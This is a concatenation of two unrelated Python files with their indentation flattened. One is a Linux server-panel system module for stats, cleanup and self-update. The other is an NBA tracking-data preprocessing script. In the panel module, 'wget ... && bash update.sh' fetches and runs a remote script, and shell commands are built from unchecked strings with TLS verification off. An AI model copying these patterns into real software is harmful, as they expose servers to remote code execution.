data = self.getMemInfo()
cpu = self.getCpuInfo(interval)
data['cpuNum'] = cpu[1]
data['cpuRealUsed'] = cpu[0]
data['time'] = self.getBootTime()
data['system'] = self.getSystemVersion()
data['isuser'] = mw.M('users').where(
'username=?', ('admin',)).count()
data['version'] = '0.0.1'
return data
def getLoadAverage(self):
c = os.getloadavg()
data = {}
data['one'] = float(c[0])
data['five'] = float(c[1])
data['fifteen'] = float(c[2])
data['max'] = psutil.cpu_count() * 2
data['limit'] = data['max']
data['safe'] = data['max'] * 0.75
return data
def getAllInfo(self, get):
data = {}
data['load_average'] = self.GetLoadAverage(get)
data['title'] = self.GetTitle()
data['network'] = self.GetNetWorkApi(get)
data['panel_status'] = not os.path.exists(
'/www/server/mdserver-web/data/close.pl')
import firewalls
ssh_info = firewalls.firewalls().GetSshInfo(None)
data['enable_ssh_status'] = ssh_info['status']
data['disable_ping_status'] = not ssh_info['ping']
data['time'] = self.GetBootTime()
# data['system'] = self.GetSystemVersion();
# data['mem'] = self.GetMemInfo();
data['version'] = web.ctx.session.version
return data
def getTitle(self):
titlePl = 'data/title.pl'
title = 'Linux面板'
if os.path.exists(titlePl):
title = mw.readFile(titlePl).strip()
return title
def getSystemVersion(self):
# 取操作系统版本
if mw.getOs() == 'darwin':
data = mw.execShell('sw_vers')[0]
data_list = data.strip().split("\n")
mac_version = ''
for x in data_list:
mac_version += x.split("\t")[1] + ' '
return mac_version
version = mw.readFile('/etc/redhat-release')
if not version:
version = mw.readFile(
'/etc/issue').strip().split("\n")[0].replace('\\n', '').replace('\l', '').strip()
else:
version = version.replace('release ', '').strip()
return version
def getBootTime(self):
# 取系统启动时间
start_time = psutil.boot_time()
run_time = time.time() - start_time
# conf = mw.readFile('/proc/uptime').split()
tStr = float(run_time)
min = tStr / 60
hours = min / 60
days = math.floor(hours / 24)
hours = math.floor(hours - (days * 24))
min = math.floor(min - (days * 60 * 24) - (hours * 60))
return mw.getInfo('已不间断运行: {1}天{2}小时{3}分钟', (str(int(days)), str(int(hours)), str(int(min))))
def getCpuInfo(self, interval=1):
# 取CPU信息
cpuCount = psutil.cpu_count()
used = psutil.cpu_percent(interval=interval)
return used, cpuCount
def getMemInfo(self):
# 取内存信息
mem = psutil.virtual_memory()
if mw.getOs() == 'darwin':
memInfo = {
'memTotal': mem.total / 1024 / 1024
}
memInfo['memRealUsed'] = memInfo['memTotal'] * (mem.percent / 100)
else:
memInfo = {
'memTotal': mem.total / 1024 / 1024,
'memFree': mem.free / 1024 / 1024,
'memBuffers': mem.buffers / 1024 / 1024,
'memCached': mem.cached / 1024 / 1024
}
memInfo['memRealUsed'] = memInfo['memTotal'] - \
memInfo['memFree'] - memInfo['memBuffers'] - \
memInfo['memCached']
return memInfo
def getMemUsed(self):
# 取内存使用率
try:
import psutil
mem = psutil.virtual_memory()
if mw.getOs() == 'darwin':
return mem.percent
memInfo = {'memTotal': mem.total / 1024 / 1024, 'memFree': mem.free / 1024 / 1024,
'memBuffers': mem.buffers / 1024 / 1024, 'memCached': mem.cached / 1024 / 1024}
tmp = memInfo['memTotal'] - memInfo['memFree'] - \
memInfo['memBuffers'] - memInfo['memCached']
tmp1 = memInfo['memTotal'] / 100
return (tmp / tmp1)
except Exception as ex:
return 1
def getDiskInfo(self, get=None):
return self.getDiskInfo2()
# 取磁盘分区信息
diskIo = psutil.disk_partitions()
diskInfo = []
for disk in diskIo:
if disk[1] == '/mnt/cdrom':
continue
if disk[1] == '/boot':
continue
tmp = {}
tmp['path'] = disk[1]
tmp['size'] = psutil.disk_usage(disk[1])
diskInfo.append(tmp)
return diskInfo
def getDiskInfo2(self):
# 取磁盘分区信息
temp = mw.execShell(
"df -h -P|grep '/'|grep -v tmpfs | grep -v devfs")[0]
tempInodes = mw.execShell(
"df -i -P|grep '/'|grep -v tmpfs | grep -v devfs")[0]
temp1 = temp.split('\n')
tempInodes1 = tempInodes.split('\n')
diskInfo = []
n = 0
cuts = ['/mnt/cdrom', '/boot', '/boot/efi', '/dev',
'/dev/shm', '/run/lock', '/run', '/run/shm', '/run/user']
for tmp in temp1:
n += 1
inodes = tempInodes1[n - 1].split()
disk = tmp.split()
if len(disk) < 5:
continue
if disk[1].find('M') != -1:
continue
if disk[1].find('K') != -1:
continue
if len(disk[5].split('/')) > 4:
continue
if disk[5] in cuts:
continue
arr = {}
arr['path'] = disk[5]
tmp1 = [disk[1], disk[2], disk[3], disk[4]]
arr['size'] = tmp1
arr['inodes'] = [inodes[1], inodes[2], inodes[3], inodes[4]]
if disk[5] == '/':
bootLog = os.getcwd() + '/tmp/panelBoot.pl'
if disk[2].find('M') != -1:
if os.path.exists(bootLog):
os.system('rm -f ' + bootLog)
else:
if not os.path.exists(bootLog):
pass
if inodes[2] != '0':
diskInfo.append(arr)
return diskInfo
# 清理系统垃圾
def clearSystem(self, get):
count = total = 0
tmp_total, tmp_count = self.ClearMail()
count += tmp_count
total += tmp_total
tmp_total, tmp_count = self.ClearOther()
count += tmp_count
total += tmp_total
return count, total
# 清理邮件日志
def clearMail(self):
rpath = '/var/spool'
total = count = 0
import shutil
con = ['cron', 'anacron', 'mail']
for d in os.listdir(rpath):
if d in con:
continue
dpath = rpath + '/' + d
time.sleep(0.2)
num = size = 0
for n in os.listdir(dpath):
filename = dpath + '/' + n
fsize = os.path.getsize(filename)
size += fsize
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
print('\t\033[1;32m[OK]\033[0m')
num += 1
total += size
count += num
return total, count
# 清理其它
def clearOther(self):
clearPath = [
{'path': '/www/server/mdserver-web', 'find': 'testDisk_'},
{'path': '/www/wwwlogs', 'find': 'log'},
{'path': '/tmp', 'find': 'panelBoot.pl'},
{'path': '/www/server/mdserver-web/install', 'find': '.rpm'}
]
total = count = 0
for c in clearPath:
for d in os.listdir(c['path']):
if d.find(c['find']) == -1:
continue
filename = c['path'] + '/' + d
fsize = os.path.getsize(filename)
total += fsize
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
count += 1
mw.serviceReload()
os.system('echo > /tmp/panelBoot.pl')
return total, count
def getNetWork(self):
# return self.GetNetWorkApi(get);
# 取网络流量信息
try:
# 取网络流量信息
networkIo = psutil.net_io_counters()[:4]
if not "otime" in session:
session['up'] = networkIo[0]
session['down'] = networkIo[1]
session['otime'] = time.time()
ntime = time.time()
networkInfo = {}
networkInfo['upTotal'] = networkIo[0]
networkInfo['downTotal'] = networkIo[1]
networkInfo['up'] = round(float(
networkIo[0] - session['up']) / 1024 / (ntime - session['otime']), 2)
networkInfo['down'] = round(
float(networkIo[1] - session['down']) / 1024 / (ntime - session['otime']), 2)
networkInfo['downPackets'] = networkIo[3]
networkInfo['upPackets'] = networkIo[2]
# print networkIo[1], session['down'], ntime, session['otime']
session['up'] = networkIo[0]
session['down'] = networkIo[1]
session['otime'] = time.time()
networkInfo['cpu'] = self.getCpuInfo()
networkInfo['load'] = self.getLoadAverage()
networkInfo['mem'] = self.getMemInfo()
return networkInfo
except Exception as e:
print(e)
return None
def getNetWorkApi(self):
# 取网络流量信息
try:
tmpfile = 'data/network.temp'
networkIo = psutil.net_io_counters()[:4]
if not os.path.exists(tmpfile):
mw.writeFile(tmpfile, str(
networkIo[0]) + '|' + str(networkIo[1]) + '|' + str(int(time.time())))
lastValue = mw.readFile(tmpfile).split('|')
ntime = time.time()
networkInfo = {}
networkInfo['upTotal'] = networkIo[0]
networkInfo['downTotal'] = networkIo[1]
networkInfo['up'] = round(
float(networkIo[0] - int(lastValue[0])) / 1024 / (ntime - int(lastValue[2])), 2)
networkInfo['down'] = round(
float(networkIo[1] - int(lastValue[1])) / 1024 / (ntime - int(lastValue[2])), 2)
networkInfo['downPackets'] = networkIo[3]
networkInfo['upPackets'] = networkIo[2]
mw.writeFile(tmpfile, str(
networkIo[0]) + '|' + str(networkIo[1]) + '|' + str(int(time.time())))
# networkInfo['cpu'] = self.GetCpuInfo(0.1)
return networkInfo
except:
return None
def getNetWorkIoData(self, start, end):
# 取指定时间段的网络Io
data = mw.M('network').dbfile('system').where("addtime>=? AND addtime<=?", (start, end)).field(
'id,up,down,total_up,total_down,down_packets,up_packets,addtime').order('id asc').select()
return self.toAddtime(data)
def getDiskIoData(self, start, end):
# 取指定时间段的磁盘Io
data = mw.M('diskio').dbfile('system').where("addtime>=? AND addtime<=?", (start, end)).field(
'id,read_count,write_count,read_bytes,write_bytes,read_time,write_time,addtime').order('id asc').select()
return self.toAddtime(data)
def getCpuIoData(self, start, end):
# 取指定时间段的CpuIo
data = mw.M('cpuio').dbfile('system').where("addtime>=? AND addtime<=?",
(start, end)).field('id,pro,mem,addtime').order('id asc').select()
return self.toAddtime(data, True)
def getLoadAverageData(self, start, end):
data = mw.M('load_average').dbfile('system').where("addtime>=? AND addtime<=?", (
start, end)).field('id,pro,one,five,fifteen,addtime').order('id asc').select()
return self.toAddtime(data)
# 格式化addtime列
def toAddtime(self, data, tomem=False):
import time
if tomem:
import psutil
mPre = (psutil.virtual_memory().total / 1024 / 1024) / 100
length = len(data)
he = 1
if length > 100:
he = 1
if length > 1000:
he = 3
if length > 10000:
he = 15
if he == 1:
for i in range(length):
data[i]['addtime'] = time.strftime(
'%m/%d %H:%M', time.localtime(float(data[i]['addtime'])))
if tomem and data[i]['mem'] > 100:
data[i]['mem'] = data[i]['mem'] / mPre
return data
else:
count = 0
tmp = []
for value in data:
if count < he:
count += 1
continue
value['addtime'] = time.strftime(
'%m/%d %H:%M', time.localtime(float(value['addtime'])))
if tomem and value['mem'] > 100:
value['mem'] = value['mem'] / mPre
tmp.append(value)
count = 0
return tmp
def setControl(self, stype, day):
filename = 'data/control.conf'
if stype == '0':
mw.execShell("rm -f " + filename)
elif stype == '1':
_day = int(day)
if _day < 1:
return mw.returnJson(False, "设置失败!")
mw.writeFile(filename, day)
elif stype == 'del':
if not mw.isRestart():
return mw.returnJson(False, '请等待所有安装任务完成再执行')
os.remove("data/system.db")
sql = db.Sql().dbfile('system')
csql = mw.readFile('data/sql/system.sql')
csql_list = csql.split(';')
for index in range(len(csql_list)):
sql.execute(csql_list[index], ())
return mw.returnJson(True, "监控服务已关闭")
else:
data = {}
if os.path.exists(filename):
try:
data['day'] = int(mw.readFile(filename))
except:
data['day'] = 30
data['status'] = True
else:
data['day'] = 30
data['status'] = False
return mw.getJson(data)
return mw.returnJson(True, "设置成功!")
def versionDiff(self, old, new):
'''
test 测试
new 有新版本
none 没有新版本
'''
new_list = new.split('.')
if len(new_list) > 3:
return 'test'
old_list = old.split('.')
ret = 'none'
isHasNew = True
if int(new_list[0]) == int(old_list[0]) and int(new_list[1]) == int(old_list[1]) and int(new_list[2]) == int(old_list[2]):
isHasNew = False
if isHasNew:
return 'new'
return ret
def getServerInfo(self):
upAddr = 'https://raw.githubusercontent.com/midoks/mdserver-web/master/version/info.json'
try:
requests.adapters.DEFAULT_RETRIES = 2
r = requests.get(upAddr, verify=False)
version = json.loads(r.content)
return version[0]
except Exception as e:
print('getServerInfo', e)
return {}
def updateServer(self, stype, version=''):
# 更新服务
try:
if not mw.isRestart():
return mw.returnJson(False, '请等待所有安装任务完成再执行!')
if stype == 'check':
version_now = config_api.config_api().getVersion()
version_new_info = self.getServerInfo()
if not 'version' in version_new_info:
return mw.returnJson(False, '服务器数据或网络有问题!')
diff = self.versionDiff(
version_now, version_new_info['version'])
if diff == 'new':
return mw.returnJson(True, '有新版本!', version_new_info['version'])
elif diff == 'test':
return mw.returnJson(True, '有测试版本!', version_new_info['version'])
else:
return mw.returnJson(False, '已经是最新,无需更新!')
if stype == 'info':
version_new_info = self.getServerInfo()
version_now = config_api.config_api().getVersion()
if not 'version' in version_new_info:
return mw.returnJson(False, '服务器数据有问题!')
diff = self.versionDiff(
version_now, version_new_info['version'])
return mw.returnJson(True, '更新信息!', version_new_info)
if stype == 'update':
if version == '':
return mw.returnJson(False, '缺少版本信息!')
v_new_info = self.getServerInfo()
if v_new_info['version'] != version:
return mw.returnJson(False, '更新失败,请重试!')
if not 'path' in v_new_info or v_new_info['path'] == '':
return mw.returnJson(False, '下载地址不存在!')
newUrl = v_new_info['path']
toPath = mw.getRootDir() + '/temp'
if not os.path.exists(toPath):
mw.execShell('mkdir -p ' + toPath)
mw.execShell('wget -O ' + toPath + '/mw.zip ' + newUrl)
mw.execShell('unzip -o ' + toPath + '/mw.zip' + ' -d ./')
mw.execShell('unzip -o mw.zip -d ./')
mw.execShell('rm -f mw.zip')
return mw.returnJson(True, '安装更新成功,需自己重启!')
return mw.returnJson(False, '已经是最新,无需更新!')
except Exception as ex:
print('updateServer', ex)
return mw.returnJson(False, "连接服务器失败!")
# 修复面板
def repPanel(self, get):
vp = ''
if mw.readFile('/www/server/mdserver-web/class/common.py').find('checkSafe') != -1:
vp = '_pro'
mw.ExecShell("wget -O update.sh " + mw.get_url() +
"/install/update" + vp + ".sh && bash update.sh")
if hasattr(web.ctx.session, 'getCloudPlugin'):
del(web.ctx.session['getCloudPlugin'])
return True
|
generate_game_numpy_arrays.py
|
import multiprocessing
import numpy as np
import pandas as pd
import pickle
import py7zr
import shutil
from settings import *
HALF_COURT_LENGTH = COURT_LENGTH // 2
THRESHOLD = 1.0
def game_name2gameid_worker(game_7zs, queue):
game_names = []
gameids = []
for game_7z in game_7zs:
game_name = game_7z.split(".7z")[0]
game_names.append(game_name)
try:
archive = py7zr.SevenZipFile(f"{TRACKING_DIR}/{game_7z}", mode="r")
archive.extractall(path=f"{TRACKING_DIR}/{game_name}")
archive.close()
except AttributeError:
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
gameids.append("N/A")
continue
try:
gameids.append(os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0])
except IndexError:
gameids.append("N/A")
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
queue.put((game_names, gameids))
def get_game_name2gameid_map():
q = multiprocessing.Queue()
dir_fs = os.listdir(TRACKING_DIR)
all_game_7zs = [dir_f for dir_f in dir_fs if dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_7zs_per_process = int(np.ceil(len(all_game_7zs) / processes))
jobs = []
for i in range(processes):
start = i * game_7zs_per_process
end = start + game_7zs_per_process
game_7zs = all_game_7zs[start:end]
p = multiprocessing.Process(target=game_name2gameid_worker, args=(game_7zs, q))
jobs.append(p)
p.start()
all_game_names = []
all_gameids = []
for _ in jobs:
(game_names, gameids) = q.get()
all_game_names.extend(game_names)
all_gameids.extend(gameids)
for p in jobs:
p.join()
df = pd.DataFrame.from_dict({"game_name": all_game_names, "gameid": all_gameids})
home_dir = os.path.expanduser("~")
df.to_csv(f"{home_dir}/test.csv", index=False)
def playerid2player_idx_map_worker(game_7zs, queue):
playerid2props = {}
for game_7z in game_7zs:
game_name = game_7z.split(".7z")[0]
try:
archive = py7zr.SevenZipFile(f"{TRACKING_DIR}/{game_7z}", mode="r")
archive.extractall(path=f"{TRACKING_DIR}/{game_name}")
archive.close()
except AttributeError:
print(f"{game_name}\nBusted.", flush=True)
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
continue
try:
gameid = os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0]
except IndexError:
print(f"No tracking data for {game_name}.", flush=True)
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
continue
df_tracking = pd.read_json(f"{TRACKING_DIR}/{game_name}/{gameid}.json")
event = df_tracking["events"].iloc[0]
players = event["home"]["players"] + event["visitor"]["players"]
for player in players:
playerid = player["playerid"]
playerid2props[playerid] = {
"name": " ".join([player["firstname"], player["lastname"]]),
}
queue.put(playerid2props)
def get_playerid2player_idx_map():
q = multiprocessing.Queue()
dir_fs = os.listdir(TRACKING_DIR)
all_game_7zs = [dir_f for dir_f in dir_fs if dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_7zs_per_process = int(np.ceil(len(all_game_7zs) / processes))
jobs = []
for i in range(processes):
start = i * game_7zs_per_process
end = start + game_7zs_per_process
game_7zs = all_game_7zs[start:end]
p = multiprocessing.Process(
target=playerid2player_idx_map_worker, args=(game_7zs, q)
)
jobs.append(p)
p.start()
playerid2props = {}
for _ in jobs:
playerid2props.update(q.get())
for p in jobs:
p.join()
playerid2player_idx = {}
player_idx2props = {}
for (player_idx, playerid) in enumerate(playerid2props):
playerid2player_idx[playerid] = player_idx
player_idx2props[player_idx] = playerid2props[playerid]
player_idx2props[player_idx]["playerid"] = playerid
return (playerid2player_idx, player_idx2props)
def get_game_time(game_clock_secs, period):
period_secs = 720 if period <= 4 else 300
period_time = period_secs - game_clock_secs
if period <= 4:
return (period - 1) * 720 + period_time
else:
return 4 * 720 + (period - 5) * 300 + period_time
def get_shot_times_worker(game_7zs, queue):
shot_times = {}
for game_7z in game_7zs:
game_name = game_7z.split(".7z")[0]
try:
gameid = os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0]
except FileNotFoundError:
continue
df_events = pd.read_csv(f"{EVENTS_DIR}/{gameid}.csv")
game_shot_times = {}
for (row_idx, row) in df_events.iterrows():
period = row["PERIOD"]
game_clock = row["PCTIMESTRING"].split(":")
game_clock_secs = 60 * int(game_clock[0]) + int(game_clock[1])
game_time = get_game_time(game_clock_secs, period)
if (row["EVENTMSGTYPE"] == 1) or (row["EVENTMSGTYPE"] == 2):
game_shot_times[game_time] = row["PLAYER1_TEAM_ABBREVIATION"]
shot_times[gameid] = game_shot_times
queue.put(shot_times)
def get_shot_times():
q = multiprocessing.Queue()
dir_fs = os.listdir(TRACKING_DIR)
all_game_7zs = [dir_f for dir_f in dir_fs if dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_7zs_per_process = int(np.ceil(len(all_game_7zs) / processes))
jobs = []
for i in range(processes):
start = i * game_7zs_per_process
end = start + game_7zs_per_process
game_7zs = all_game_7zs[start:end]
p = multiprocessing.Process(target=get_shot_times_worker, args=(game_7zs, q))
jobs.append(p)
p.start()
shot_times = {}
for _ in jobs:
shot_times.update(q.get())
for p in jobs:
p.join()
return shot_times
def fill_in_periods(game_hoop_sides):
for p1 in range(4):
if p1 not in game_hoop_sides:
continue
adder = 1 if p1 <= 2 else 3
p2 = (p1 % 2) + adder
if p2 not in game_hoop_sides:
game_hoop_sides[p2] = game_hoop_sides[p1].copy()
period_hoop_sides = list(game_hoop_sides[p1].items())
swapped = {
period_hoop_sides[0][0]: period_hoop_sides[1][1],
period_hoop_sides[1][0]: period_hoop_sides[0][1],
}
p2s = [3, 4] if p1 <= 2 else [1, 2]
for p2 in p2s:
if p2 not in game_hoop_sides:
game_hoop_sides[p2] = swapped.copy()
return game_hoop_sides
def check_periods(game_hoop_sides, team, game):
for period in range(4):
if period in {2, 4}:
if period - 1 in game_hoop_sides:
assert (
game_hoop_sides[period - 1][team] == game_hoop_sides[period][team]
), f"{team} has different sides in periods {period} and {period - 1} of {game}."
if period in {3, 4}:
for first_half in [1, 2]:
if first_half in game_hoop_sides:
assert (
game_hoop_sides[first_half][team]
!= game_hoop_sides[period][team]
), f"{team} has same side in periods {first_half} and {period} of {game}."
def get_game_hoop_sides(teams, hoop_side_counts, game):
[team_a, team_b] = list(teams)
game_hoop_sides = {period: {} for period in hoop_side_counts}
do_check = False
periods = list(hoop_side_counts)
periods.sort()
for period in periods:
if len(hoop_side_counts[period]) == 0:
print(f"No shooting data for {period} of {game}.")
continue
for team in teams:
if team not in hoop_side_counts[period]:
print(f"Missing {team} for {period} of {game}.")
hoop_side_counts[period][team] = {0: 0, COURT_LENGTH: 0}
l_count = hoop_side_counts[period][team][0]
r_count = hoop_side_counts[period][team][COURT_LENGTH]
if l_count > r_count:
game_hoop_sides[period][team] = 0
elif l_count < r_count:
game_hoop_sides[period][team] = COURT_LENGTH
else:
do_check = True
if do_check:
team_in = team_a if team_a in game_hoop_sides[period] else team_b
team_out = team_a if team_a not in game_hoop_sides[period] else team_b
hoop_side = game_hoop_sides[period][team_in]
if hoop_side == 0:
game_hoop_sides[period][team_out] = 0
else:
game_hoop_sides[period][team_out] = COURT_LENGTH
do_check = False
assert (
game_hoop_sides[period][team_a] != game_hoop_sides[period][team_b]
), f"{team_a} and {team_b} have same side in {period} of {game}."
game_hoop_sides = fill_in_periods(game_hoop_sides)
for team in teams:
check_periods(game_hoop_sides, team, game)
return game_hoop_sides
def get_hoop_sides_worker(game_7zs, queue):
hoop_sides = {}
for game_7z in game_7zs:
game_name = game_7z.split(".7z")[0]
try:
gameid = os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0]
except FileNotFoundError:
continue
df_tracking = pd.read_json(f"{TRACKING_DIR}/{game_name}/{gameid}.json")
hoop_side_counts = {}
used_game_times = set()
teams = set()
for tracking_event in df_tracking["events"]:
for moment in tracking_event["moments"]:
period = moment[0]
game_clock = moment[2]
game_time = int(get_game_time(game_clock, period))
if (game_time in shot_times[gameid]) and (
game_time not in used_game_times
):
ball_x = moment[5][0][2]
if ball_x < HALF_COURT_LENGTH:
hoop_side = 0
else:
hoop_side = COURT_LENGTH
if period not in hoop_side_counts:
hoop_side_counts[period] = {}
shooting_team = shot_times[gameid][game_time]
if shooting_team not in hoop_side_counts[period]:
hoop_side_counts[period][shooting_team] = {
0: 0,
COURT_LENGTH: 0,
}
hoop_side_counts[period][shooting_team][hoop_side] += 1
used_game_times.add(game_time)
teams.add(shooting_team)
if len(teams) == 0:
print(f"The moments in the {game_name} JSON are empty.", flush=True)
continue
hoop_sides[gameid] = get_game_hoop_sides(teams, hoop_side_counts, game_name)
queue.put(hoop_sides)
def get_team_hoop_sides():
q = multiprocessing.Queue()
dir_fs = os.listdir(TRACKING_DIR)
all_game_7zs = [dir_f for dir_f in dir_fs if dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_7zs_per_process = int(np.ceil(len(all_game_7zs) / processes))
jobs = []
for i in range(processes):
start = i * game_7zs_per_process
end = start + game_7zs_per_process
game_7zs = all_game_7zs[start:end]
p = multiprocessing.Process(target=get_hoop_sides_worker, args=(game_7zs, q))
jobs.append(p)
p.start()
hoop_sides = {}
for _ in jobs:
hoop_sides.update(q.get())
for p in jobs:
p.join()
return hoop_sides
def get_event_stream(gameid):
df_events = pd.read_csv(f"{EVENTS_DIR}/{gameid}.csv")
df_events = df_events.fillna("")
df_events["DESCRIPTION"] = (
df_events["HOMEDESCRIPTION"]
+ " "
+ df_events["NEUTRALDESCRIPTION"]
+ " "
+ df_events["VISITORDESCRIPTION"]
)
# Posession times.
# EVENTMSGTYPE descriptions can be found at: https://github.com/rd11490/NBA_Tutorials/tree/master/analyze_play_by_play.
event_col = "EVENTMSGTYPE"
description_col = "DESCRIPTION"
player1_team_col = "PLAYER1_TEAM_ABBREVIATION"
teams = list(df_events[player1_team_col].unique())
teams.sort()
teams = teams[1:] if len(teams) > 2 else teams
event = None
score = "0 - 0"
# pos_team is the team that had possession prior to the event.
(pos_team, pos_team_idx) = (None, None)
jump_ball_team_idx = None
# I think most of these are technical fouls.
skip_fouls = {10, 11, 16, 19}
events = set()
pos_stream = []
event_stream = []
for (row_idx, row) in df_events.iterrows():
period = row["PERIOD"]
game_clock = row["PCTIMESTRING"].split(":")
game_clock_secs = 60 * int(game_clock[0]) + int(game_clock[1])
game_time = get_game_time(game_clock_secs, period)
description = row[description_col].lower().strip()
eventmsgtype = row[event_col]
# Don't know.
if eventmsgtype == 18:
continue
# Blank line.
elif eventmsgtype == 14:
continue
# End of a period.
elif eventmsgtype == 13:
if period == 4:
jump_ball_team_idx = None
continue
# Start of a period.
elif eventmsgtype == 12:
if 2 <= period <= 4:
if period == 4:
pos_team_idx = jump_ball_team_idx
else:
pos_team_idx = (jump_ball_team_idx + 1) % 2
elif 6 <= period:
pos_team_idx = (jump_ball_team_idx + (period - 5)) % 2
continue
# Ejection.
elif eventmsgtype == 11:
continue
# Jump ball.
elif eventmsgtype == 10:
if int(row["PLAYER3_ID"]) in TEAM_ID2PROPS:
pos_team = TEAM_ID2PROPS[int(row["PLAYER3_ID"])]["abbreviation"]
else:
pos_team = row["PLAYER3_TEAM_ABBREVIATION"]
if pos_team == teams[0]:
pos_team_idx = 0
else:
pos_team_idx = 1
if (period in {1, 5}) and (jump_ball_team_idx is None):
jump_ball_team_idx = pos_team_idx
continue
# Timeout.
elif eventmsgtype == 9:
# TV timeout?
if description == "":
continue
event = "timeout"
# Substitution.
elif eventmsgtype == 8:
continue
# Violation.
elif eventmsgtype == 7:
# With 35 seconds left in the fourth period, there was a kicked ball
# violation attributed to Wayne Ellington of the Brooklyn Nets, but the
# following event is a shot by the Nets, which means possession never changed.
if (gameid == "0021500414") and (row_idx == 427):
continue
# Goaltending is considered a made shot, so the following event is always the
# made shot event.
if "goaltending" in description:
score = row["SCORE"] if row["SCORE"] else score
continue
# Jump ball violations have weird possession rules.
elif "jump ball" in description:
if row["PLAYER1_TEAM_ABBREVIATION"] == teams[0]:
pos_team_idx = 1
else:
pos_team_idx = 0
pos_team = teams[pos_team_idx]
if (period == 1) and (game_time == 0):
jump_ball_team_idx = pos_team_idx
continue
else:
if row[player1_team_col] == teams[pos_team_idx]:
event = "violation_offense"
pos_team_idx = (pos_team_idx + 1) % 2
else:
event = "violation_defense"
# Foul.
elif eventmsgtype == 6:
# Skip weird fouls.
if row["EVENTMSGACTIONTYPE"] in skip_fouls:
score = row["SCORE"] if row["SCORE"] else score
continue
else:
if row[player1_team_col] == teams[pos_team_idx]:
event = "offensive_foul"
pos_team_idx = (pos_team_idx + 1) % 2
else:
event = "defensive_foul"
# Turnover.
elif eventmsgtype == 5:
if "steal" in description:
event = "steal"
elif "goaltending" in description:
event = "goaltending_offense"
elif (
("violation" in description)
or ("dribble" in description)
or ("traveling" in description)
):
event = "violation_offense"
else:
event = "turnover"
# Team turnover.
if row[player1_team_col] == "":
team_id = int(row["PLAYER1_ID"])
team_abb = TEAM_ID2PROPS[team_id]["abbreviation"]
else:
team_abb = row[player1_team_col]
pos_team_idx = 1 if team_abb == teams[0] else 0
# Rebound.
elif eventmsgtype == 4:
# With 17 seconds left in the first period, Spencer Hawes missed a tip in,
# which was rebounded by DeAndre Jordan. The tip in is recorded as a rebound
# and a missed shot for Hawes. All three events have the same timestamp,
# which seems to have caused the order of the events to be slightly shuffled
# with the Jordan rebound occurring before the tip in.
if (gameid == "0021500550") and (row_idx == 97):
continue
# Team rebound.
if row[player1_team_col] == "":
team_id = int(row["PLAYER1_ID"])
team_abb = TEAM_ID2PROPS[team_id]["abbreviation"]
if team_abb == teams[pos_team_idx]:
event = "rebound_offense"
else:
event = "rebound_defense"
pos_team_idx = (pos_team_idx + 1) % 2
elif row[player1_team_col] == teams[pos_team_idx]:
event = "rebound_offense"
else:
event = "rebound_defense"
pos_team_idx = (pos_team_idx + 1) % 2
# Free throw.
elif eventmsgtype == 3:
# See rules for technical fouls: https://official.nba.com/rule-no-12-fouls-and-penalties/.
# Possession only changes for too many players, which is extremely rare.
if "technical" not in description:
pos_team_idx = 0 if row[player1_team_col] == teams[0] else 1
if (
("Clear Path" not in row[description_col])
and ("Flagrant" not in row[description_col])
and ("MISS" not in row[description_col])
and (
("1 of 1" in description)
or ("2 of 2" in description)
or ("3 of 3" in description)
)
):
# Hack to handle foul shots for away from play fouls.
if ((gameid == "0021500274") and (row_idx == 519)) or (
(gameid == "0021500572") and (row_idx == 428)
):
pass
# This event is a made foul shot by Thaddeus Young of the Brooklyn
# Nets following an and-one foul, so possession should have changed
# to the Milwaukee Bucks. However, the next event is a made shot by
# Brook Lopez (also of the Brooklyn Nets) with no event indicating a
# change of possession occurring before it.
elif (gameid == "0021500047") and (row_idx == 64):
pass
else:
pos_team_idx = (pos_team_idx + 1) % 2
pos_team = teams[pos_team_idx]
score = row["SCORE"] if row["SCORE"] else score
continue
# Missed shot.
elif eventmsgtype == 2:
if "dunk" in description:
shot_type = "dunk"
elif "layup" in description:
shot_type = "layup"
else:
shot_type = "shot"
if "BLOCK" in row[description_col]:
miss_type = "block"
else:
miss_type = "miss"
event = f"{shot_type}_{miss_type}"
if row[player1_team_col] != teams[pos_team_idx]:
print(pos_stream[-5:])
raise ValueError(f"Incorrect possession team in row {str(row_idx)}.")
# Made shot.
elif eventmsgtype == 1:
if "dunk" in description:
shot_type = "dunk"
elif "layup" in description:
shot_type = "layup"
else:
shot_type = "shot"
event = f"{shot_type}_made"
if row[player1_team_col] != teams[pos_team_idx]:
print(pos_stream[-5:])
raise ValueError(f"Incorrect possession team in row {str(row_idx)}.")
pos_team_idx = (pos_team_idx + 1) % 2
events.add(event)
pos_stream.append(pos_team_idx)
if row[player1_team_col] == "":
team_id = int(row["PLAYER1_ID"])
event_team = TEAM_ID2PROPS[team_id]["abbreviation"]
else:
event_team = row[player1_team_col]
event_stream.append(
{
"game_time": game_time - 1,
"pos_team": pos_team,
"event": event,
"description": description,
"event_team": event_team,
"score": score,
}
)
# With 17 seconds left in the first period, Spencer Hawes missed a tip in,
# which was rebounded by DeAndre Jordan. The tip in is recorded as a rebound
# and a missed shot for Hawes. All three events have the same timestamp,
# which seems to have caused the order of the events to be slightly shuffled
# with the Jordan rebound occurring before the tip in.
if (gameid == "0021500550") and (row_idx == 98):
event_stream.append(
{
"game_time": game_time - 1,
"pos_team": pos_team,
"event": "rebound_defense",
"description": "jordan rebound (off:2 def:5)",
"event_team": "LAC",
"score": score,
}
)
pos_team_idx = (pos_team_idx + 1) % 2
# This event is a missed shot by Kawhi Leonard of the San Antonio Spurs. The next
# event is a missed shot by Bradley Beal of the Washington Wizards with no
# event indicating a change of possession occurring before it.
if (gameid == "0021500061") and (row_idx == 240):
pos_team_idx = (pos_team_idx + 1) % 2
pos_team = teams[pos_team_idx]
score = row["SCORE"] if row["SCORE"] else score
return event_stream
